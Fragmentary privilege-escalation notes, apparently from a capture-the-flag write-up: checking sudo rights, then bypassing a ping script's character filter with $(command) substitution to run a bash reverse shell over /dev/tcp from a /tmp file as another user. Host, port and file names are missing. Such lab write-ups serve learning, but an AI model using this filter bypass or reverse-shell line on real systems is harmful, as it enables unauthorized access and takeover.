sudo -l wins!

sudo nano

/bin/nano /opt/priv

running a SUDO file with another user:


It takes our input (it assumes that it’s an ip) and executes ping on it, to prevent command injection it checks for these characters:

& ; - ` || |

However, It doesn’t check for the dollar sign ($), the dollar sign can be used to execute commands like this: $(command) So for example if we do ping -c 1 $(echo, echo will be executed first then the ping command will be executed:

echo 'bash -c "bash -i >& /dev/tcp/ 0>&1"' > /tmp/

chmod +x /tmp/

and run the same script

--- we could've also done ($bash)

Now we are pepper!

Last updated